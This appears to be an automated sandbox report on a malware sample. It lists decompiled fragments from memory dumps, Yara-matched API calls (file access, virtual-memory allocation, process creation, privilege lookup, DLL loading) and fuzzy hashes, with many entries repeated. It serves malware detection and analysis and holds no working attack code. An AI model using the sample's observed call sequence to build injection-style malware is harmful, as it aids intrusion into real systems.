                        				E0041A950(_t16, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
                        				ExitProcess(_a8);
                        			}






                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: f174ed7a6cc0383e1bc0b746e138063a90d4fe1c5f1db2927655cf390978c118
                        • Instruction ID: 1d063885dd3c017bc8dd67df55b749204f85431882b9801c8c7610f30eb97a14
                        • Opcode Fuzzy Hash: f174ed7a6cc0383e1bc0b746e138063a90d4fe1c5f1db2927655cf390978c118
                        • Instruction Fuzzy Hash: 3AE026B0211200AFD620CF64CC85FC73FA5AF58750F088555BA585F342C534AA00C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A0A0(intOrPtr _a4, int _a8) {
                        				void* _t10;
                        
                        				_t5 = _a4;
                        				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                        				ExitProcess(_a8);
                        			}





                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                        • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                        • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        C-Code - Quality: 50%
                        			E00407AFA(char __eax, void* __ebx, void* __ecx, void* __esi) {
                        
                        				_push(__eax);
                        				 *((char*)(__eax - 0x17)) = __eax;
                        				 *((intOrPtr*)(__esi + 0x35)) =  *((intOrPtr*)(__esi + 0x35)) - __eax;
                        				asm("sbb ah, [ecx-0x2d]");
                        				return 1;
                        			}




                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8c99288312cf61a83f808d8210851dee2f98ecb823c7b058a2087e4f0a9a1208
                        • Instruction ID: 8eaa88adb882a7b9ca66d15baf5b2a18225c1985b38d345928df3fc1abd6908e
                        • Opcode Fuzzy Hash: 8c99288312cf61a83f808d8210851dee2f98ecb823c7b058a2087e4f0a9a1208
                        • Instruction Fuzzy Hash: C6D012219191C40ED3514E3DA4583B9FFF8DF5B115F0821EFDC8C9B612D942D49183A9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E00417D6A(void* __eax, void* __edx, void* __fp0) {
                        
                        				asm("cld");
                        				return __eax;
                        			}




                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 431879c90aae6d52ebbd29242ba8ee3710ad2188535c33ae1ac0a3f433997142
                        • Instruction ID: 86dbae54e1d7f2d6806d8e0e661e90bac83b547bf6bb713b955fe50c1bfcd7f5
                        • Opcode Fuzzy Hash: 431879c90aae6d52ebbd29242ba8ee3710ad2188535c33ae1ac0a3f433997142
                        • Instruction Fuzzy Hash: 05B01213F0100C0045201E49B8000F5F334D1C70FBE1173A7DD0CB34008403C52401DC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wKI,007A002E,00000000,00000060,00000000,00000000), ref: 00499D9D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`$wKI
                        • API String ID: 823142352-1392962835
                        • Opcode ID: 80996dbe2ca3641d390339bd1b78e4fb7c5dcb55ba60791c5899aee99d2878a5
                        • Instruction ID: 98c05ee266a6dcfbb8d21a9be0cb4d6a442089adf8a131950dba7bd7db3a2220
                        • Opcode Fuzzy Hash: 80996dbe2ca3641d390339bd1b78e4fb7c5dcb55ba60791c5899aee99d2878a5
                        • Instruction Fuzzy Hash: 8301E4B2200109BBCB08CF98DC85EEB77A9AF8C754F158248FA5D97241C630E811CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wKI,007A002E,00000000,00000060,00000000,00000000), ref: 00499D9D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`$wKI
                        • API String ID: 823142352-1392962835
                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction ID: 97a92ae4c2c266d7e8fe84036a901aa511d1aea3c31d1be6e08119eab301c8cb
                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction Fuzzy Hash: F7F0BDB2200208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00482D11,00002000,00003000,00000004), ref: 00499F69
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: d6b25e2f8bb1222dd64fda5c28b3e4b263ea45a0a9cecce9c60d2ab0f49de05a
                        • Instruction ID: 803413e39a0dadf72057534054408de810c45351d0a62ec171882a66b3f86eca
                        • Opcode Fuzzy Hash: d6b25e2f8bb1222dd64fda5c28b3e4b263ea45a0a9cecce9c60d2ab0f49de05a
                        • Instruction Fuzzy Hash: 040112B2200209AFCB08DF89DC81EAB77ADEF88314F118519FE5997241C634E820CBF4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtReadFile.NTDLL(?,?,FFFFFFFF,004949F1,?,?,?,?,004949F1,FFFFFFFF,?,2MI,?,00000000), ref: 00499E45
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction ID: 1c58368c15a2fa15c476183430405eb94a5c6b125596b33a41bb8134603823c2
                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction Fuzzy Hash: 7CF0A4B2200208AFCB14DF89DC91EEB77ADAF8C754F158659BE1D97241D630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00482D11,00002000,00003000,00000004), ref: 00499F69
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction ID: 1c949b96e676d0120fcb5ca6ba071d3f1a634fe98e00740c74580087da250a61
                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction Fuzzy Hash: C6F015B2200208AFCB14DF89CC81EAB77ADAF88754F118559BE1897241C630F810CBE4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtClose.NTDLL(00494D10,?,?,00494D10,00000000,FFFFFFFF), ref: 00499EA5
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 237f0b0ffd172581ca5bda365d842472bd6826656995c823854bab60ced388a1
                        • Instruction ID: 3b5865e146b5f85002ea7767cb375d37ee5135e4a6258acd39a11717300f4c08
                        • Opcode Fuzzy Hash: 237f0b0ffd172581ca5bda365d842472bd6826656995c823854bab60ced388a1
                        • Instruction Fuzzy Hash: 03E08C71200210BBEB10EBA4CC85E977B68FF49310F1184AAFA2C9B242D630A60087D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtClose.NTDLL(00494D10,?,?,00494D10,00000000,FFFFFFFF), ref: 00499EA5
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction ID: 3c4be89abaee967ef4a3f5c02ac6b9cf4ee52eecc81dcd3f18f0687a62220058
                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction Fuzzy Hash: EDD01776200214ABDB10EB99CC86EA77BACEF48760F1544A9BA5C9B242C530FA1086E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 11dd1b85662aaad600b5f1cf714ddc28b38de9e0beca919b11e95ab32052caf6
                        • Instruction ID: 41eef3010420c066ec62bbc59af5f5d9840f0025d2ee7d7b7f7bbcd71485786b
                        • Opcode Fuzzy Hash: 11dd1b85662aaad600b5f1cf714ddc28b38de9e0beca919b11e95ab32052caf6
                        • Instruction Fuzzy Hash: 8690026231180152D20065694C54B07000597D0343F51C159A0144594DCD5589717561
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 4a956812789da644b978d87cbcbd6dfe2ba0a598084772bdf7df3a3459f9d5f3
                        • Instruction ID: 29c032ab5a4b43c9a59f5b174acb349ba7f1f2c15d503781165b2e192cf85e24
                        • Opcode Fuzzy Hash: 4a956812789da644b978d87cbcbd6dfe2ba0a598084772bdf7df3a3459f9d5f3
                        • Instruction Fuzzy Hash: AA90027230100523D11161594544707000997D0281F91C456A0414598E9A968A62B161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 53035e5fa1ef18c212784949f7cd3874a597304d7cfdf7a57cd589c694ffedfb
                        • Instruction ID: 625ed9c01c9c84ef92776903ac682d018d84fa346cf9c9678850c5903545ddd3
                        • Opcode Fuzzy Hash: 53035e5fa1ef18c212784949f7cd3874a597304d7cfdf7a57cd589c694ffedfb
                        • Instruction Fuzzy Hash: 1D900262342042625545B15944445074006A7E0281791C056A1404990D89669966F661
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 24792e8080da6aefad94a53b5e96be0fa20c971a0b7c9c5f55a05f8faecb2cb4
                        • Instruction ID: 0c067067e5b4e20f29f30372725fd09a8a65d54bbf4af6d500ae4369d47eb1bc
                        • Opcode Fuzzy Hash: 24792e8080da6aefad94a53b5e96be0fa20c971a0b7c9c5f55a05f8faecb2cb4
                        • Instruction Fuzzy Hash: 729002A234100552D10061594454B070005D7E1341F51C059E1054594E8A59CD627166
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a2834a363dba75d8522f2b004aee1b05509319015e027a11879271a6324d1d75
                        • Instruction ID: ea1b2bce12048d3791479f3548c0385db784346976b98fece1a99942031c0209
                        • Opcode Fuzzy Hash: a2834a363dba75d8522f2b004aee1b05509319015e027a11879271a6324d1d75
                        • Instruction Fuzzy Hash: 889002B230100512D14071594444747000597D0341F51C055A5054594F8A998EE576A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: f7e0be624a905a82763053301e92bfd4811b16140c852a4c819a850ca7213796
                        • Instruction ID: 19c28a8c2709a69bb18ceee5ca81e5dcbed2dc807e305d72fa3bf2c12d8726b0
                        • Opcode Fuzzy Hash: f7e0be624a905a82763053301e92bfd4811b16140c852a4c819a850ca7213796
                        • Instruction Fuzzy Hash: DA90027230108912D1106159844474B000597D0341F55C455A4414698E8AD589A17161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 0097e92b0e67fa758fa00ee005fe26d26dff5bf700adcf05332a780858dfee80
                        • Instruction ID: dfb505904cc45d1a0dcd106d9d0749e2066a45d9274d5d9570d31f57b18c4871
                        • Opcode Fuzzy Hash: 0097e92b0e67fa758fa00ee005fe26d26dff5bf700adcf05332a780858dfee80
                        • Instruction Fuzzy Hash: 7F90027230100952D10061594444B47000597E0341F51C05AA0114694E8A55C9617561
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ab1bbecac591ce1c74e724e3b67913b5f6bb607627cf5d00eac19659ec5147cc
                        • Instruction ID: b5afad634c3e90463ed8b5256f8c3dec9fecdcd61996e47c83a24b219f694346
                        • Opcode Fuzzy Hash: ab1bbecac591ce1c74e724e3b67913b5f6bb607627cf5d00eac19659ec5147cc
                        • Instruction Fuzzy Hash: 9C90027230100912D1807159444464B000597D1341F91C059A0015694ECE558B6977E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 40745eff11caea04bb4d897c83776eca3c74b9c29a8d819376355908c957ffe2
                        • Instruction ID: 6734a70e775681debcc1b6ef37770fb25dee7cc8b66adb72768844fc870993a5
                        • Opcode Fuzzy Hash: 40745eff11caea04bb4d897c83776eca3c74b9c29a8d819376355908c957ffe2
                        • Instruction Fuzzy Hash: B490027230504952D14071594444A47001597D0345F51C055A00546D4E9A658E65B6A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e60f7c3c2bae7c52fa62b3da404d1e793efd2857042e38a49bd4b878ec93f64d
                        • Instruction ID: 2bf93f19d70ab5795a407ab9c99a2669b7d8c97a666c5f82569f04b33aee65a5
                        • Opcode Fuzzy Hash: e60f7c3c2bae7c52fa62b3da404d1e793efd2857042e38a49bd4b878ec93f64d
                        • Instruction Fuzzy Hash: 1890026A31300112D1807159544860B000597D1242F91D459A0005598DCD5589797361
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5aa944fb9e4a026c1a687482044a6c5ccfc43d52db13a86eae0e3e47086e4071
                        • Instruction ID: 6175cf2e50bb7d0adb37711347172b526373905a23310d0bd8bedd4a3d444870
                        • Opcode Fuzzy Hash: 5aa944fb9e4a026c1a687482044a6c5ccfc43d52db13a86eae0e3e47086e4071
                        • Instruction Fuzzy Hash: 6190027231114512D11061598444707000597D1241F51C455A0814598E8AD589A17162
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 08dafee0c1f8a57de469a2f41d227032ecc7d9742390a2c8cd4b98a30110fe7e
                        • Instruction ID: 0f25810a570f7419c2451b33f0137694504fbfdf5688bf2b2ab4cf61bbbb7775
                        • Opcode Fuzzy Hash: 08dafee0c1f8a57de469a2f41d227032ecc7d9742390a2c8cd4b98a30110fe7e
                        • Instruction Fuzzy Hash: 9E90027230100512D10065995448647000597E0341F51D055A5014595FCAA589A17171
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b50a74f814530943ea30e6bcda0133be35ac1767d6d0474418d4ca1d1f657939
                        • Instruction ID: e5c6d74e666b3e30048e9b51c0804a605022b565d7cb8916987e0c4aea9823fb
                        • Opcode Fuzzy Hash: b50a74f814530943ea30e6bcda0133be35ac1767d6d0474418d4ca1d1f657939
                        • Instruction Fuzzy Hash: E99002A230200113410571594454617400A97E0241B51C065E10045D0EC96589A17165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: f477fe62e0af22267a2030e5a16cbba96d544df9d28cb9929fc3b1e89223274d
                        • Instruction ID: eab4c8ac0f28caa9609bebc00f2b7054c59980d62c20076cc684d952b5b37849
                        • Opcode Fuzzy Hash: f477fe62e0af22267a2030e5a16cbba96d544df9d28cb9929fc3b1e89223274d
                        • Instruction Fuzzy Hash: 34900477311001130105F55D07445070047D7D53D1351C075F10055D0DDF71CD717171
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00483AF8), ref: 0049A08D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        • Opcode ID: d8beb6b6719ddd87adbc40b0542f4f5e6f1fcec855d26c12b20d6147c604ab6a
                        • Instruction ID: 6c71cac3295db1c21611e6d3524a7e067895cea548aab3fbb5bd63ebae0cbe5b
                        • Opcode Fuzzy Hash: d8beb6b6719ddd87adbc40b0542f4f5e6f1fcec855d26c12b20d6147c604ab6a
                        • Instruction Fuzzy Hash: 8EE04FB12006056FDB14DFA9CC49EE77BA9EF88350F114659FD1C97251C631E910CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00483AF8), ref: 0049A08D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction ID: 4b9444c18e4bdfdbc0ac2fbe0ded8c38104e75f03d573d57517faeb62e1c7856
                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction Fuzzy Hash: 55E012B1200208ABDB18EF99CC49EA77BACAF88750F018559BE185B242C630E9108AF0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlAllocateHeap.NTDLL(004944F6,?,?,oLI,?,004944F6,?,?,?,?,?,00000000,00000000,?), ref: 0049A04D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: oLI
                        • API String ID: 1279760036-4010191922
                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                        • Instruction ID: 3b4ff9c5d8df61aa8d997f38a41d60fc4fc5dbf67c4e10c530d92334df34c8e5
                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                        • Instruction Fuzzy Hash: 4DE012B1200208ABDB14EF99CC41EA77BACAF88654F118559BE185B242C630F9108AF0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0048834A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0048836B
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 82079f10d3c2bb338251c77b1746ba6aed9656e107e48eb6c4cfa7d71c1448a4
                        • Instruction ID: c1bbcc32430a91a97c3c87409e08d27e23c2d73badbe2889df0539698d0f1fb8
                        • Opcode Fuzzy Hash: 82079f10d3c2bb338251c77b1746ba6aed9656e107e48eb6c4cfa7d71c1448a4
                        • Instruction Fuzzy Hash: 5B018831A802187AEB20B6959C43FBF765C6B40F54F04451EFF04BA1C2D6D9690547E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0048AD32
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                        • Instruction ID: ac5a3d024dd7395d1c198af0ad605604bd88ace6b87a77ce980b25db59ca03f4
                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                        • Instruction Fuzzy Hash: C30152B5D0020DA7DF10EBA5DC42F9EB7B89B54308F0045A6A90897241F674EB14C795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0049A124
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction ID: 186d7c20a6cd15e21b9b4a3c85140b5ed0bc367c30ae921e4a7072e7ea458b22
                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction Fuzzy Hash: DC01B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0048F192,0048F192,?,00000000,?,?), ref: 0049A1F0
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction ID: f9e5db37abc0aaae2677b216b1c2f9b48515c5aac8e031180897d11d523684af
                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction Fuzzy Hash: 57E01AB12002086BDB10DF49CC85EE737ADAF89650F018565BE0C57241C934E8108BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
